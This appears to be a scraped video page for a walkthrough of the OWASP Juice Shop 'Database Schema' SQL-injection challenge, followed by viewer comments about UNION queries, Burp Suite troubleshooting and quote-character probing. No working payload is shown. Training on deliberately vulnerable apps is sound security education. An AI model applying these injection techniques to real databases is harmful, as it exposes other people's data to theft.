★ ★ ★ Database Schema (Injection)
HTML-код
- Опубликовано: 11 сен 2024
- Exfiltrate the entire DB schema definition via SQL Injection.
🤴 Credits to Bjoern Kimminich for providing this excellent vulnerable web app. Download here: github.com/bki...
🔗 www.sqlite.org...
🔗www.sqlitetuto...
📃 This video is part of the OWASP Juice Shop solutions & walkthrough playlist ( • ★ Zero Stars (Improper... .
📓 Make sure to check out all the other videos in this playlist as well to get a full tutorial.
💡 If you have any questions or want to request a new video about a special topic, feel free to leave me a comment. You can also contact me on all of my social medias below.
💖 I need your help. Subscribe to this channel, link and retweet my videos and share them with your friends. This going to help make this project more sustainable in the long-run.
💙 Last but not least: Subscribe to my Twitter channels / hacksplained & / pascalsec
👏 Awesome video! When you're through with the 95 challenges, I might sort your playlist by video runtime and adjust the challenge difficulty levels accordingly! I guess this one might have been a ⭐⭐⭐⭐ rather than a ⭐⭐⭐ ... Cheers & keep up the great work!
Thanks so much Björn
Have you implemented some new security features? With the newest Juice Shop release I am not able to reproduce this tutorial anymore. This is becoming really frustrating because many of the tutorials for the Juice Shop are already outdated or you have to make fundamental changes to get things work.
@@timobllscn3954 All Hacksplained videos are showing Juice Shop 10 or 11, so they are current. Checking pwning.owasp-juice.shop/appendix/solutions.html might help you out if something doesn't work as you think it should.
Dude! you are Awesome!
swear, in an honest world your videos should have millions of views. Thank you so much!
Fantastic walkthrough and explanation
ur flow of explanation is amazing !!
u got a new subscriber
Awesome, thank you!
please help me spreading the word :)
Thanks so much for this I’ve been working on this challenge for two days! Keep up the great content
Did you end up solving it with my video? :)
I am super happy I could help. What did cause you the most problems with this challenge?
@@Hacksplained Yeah i successfully solved the challenge using your solution. I had trouble with it because i'm a noob and i'm just starting out on the pentesting path. My knowledge of SQL is low at this point but i'll keep at it. Thanks again for the content.
@@quinnlaup That's good to hear :) Glad the video helped.
Keep going on your path to become a masterly hacker!! Keeping my fingers crossed!
Hope the other videos will help as well :)
@@Hacksplained i solved 4 after your video lol❤️😂
@@gauravsehwag2172 Even better :)
i think the hardest part was to understand sql commands. specifically what UNION command is doing. it puts tables on top of each other.
Definitely something you need to put your hands on directly in order to grasp the concept. Once you get it, it's a super handy command though :)
why my burpsuite show nothing when i search banana or banana'
why are we using 20 in between everything?
Do you remember which version of the Juice Shop you were using when you created this tutorial?
I think it was v10 back then. However, there is already a newer version available :)
11:22 why did you choose sql out of all the other option !??
And is this a threat to the website ?
To get the schema as explained in that very second. You can gather some valuable DB insights by doing that, so yes it's - an attacker can make use of that information!
Hi. What if I wanted to see Users or different collumn from this table. Which command can I use in this injection? BTW thank you for video!
Hey, check out some of the other sql injection videos first. There's lots of info in there 😊
If that doesn't help, I am happy to come back with more answers
eyw
Why does my proxy doesn't show the initial data, on the response?
Can you please give me an mm:ss mark where you are facing your issue?
@@Hacksplained 3:30, the moment you clicked the response button. I can't see the data
@@patrickpena7178 hard to tell with that level of detail. Have you made sure that you have sent the exact same request?
Are you really not seeing anything at all or just a different response?
I had the same issue on my end. My response for the GET request was showing "304 Not Modified".
Work around is to just send the request to the repeater anyway and try searching as Hacksplained did, you will get the response you see in the video.
Another work around that worked was logged out, and cleared all cookies and cache. Refreshing the screen as anonymous while sending to burp with Foxy fixed the problem and I see a response now. When I logged back in again and tried refreshing the screen, nothing again. not sure why.
I am an it student
I know structural programming and OOP
Also comptia a+ and basic knowledge about security and networks and cryptography.
Have been following you in twitter
But honestly I can’t understand the topics you treat .
Could you please tell me
I am not quite sure if I understand your question the right way. What exactly do you wanna know?
I mean I want you to tell me what are these things that you teach here I just want a general idea
@@guyfawkes6930 In this playlist, a complete walkthrough of OWASP juice shop which is basically a journey through the OWASP Top 10.
Generally speaking, all sorts of hacking advice, how tos for new tools and much more.
Hacksplained thanks I appreciate that
@@guyfawkes6930 You are welcome :) I hope you keep watching.
A FOR AWESOME!!!!!
exactly!
sequel lite XDDDDDDD
SEEEEAAAQUUUEL! 🐡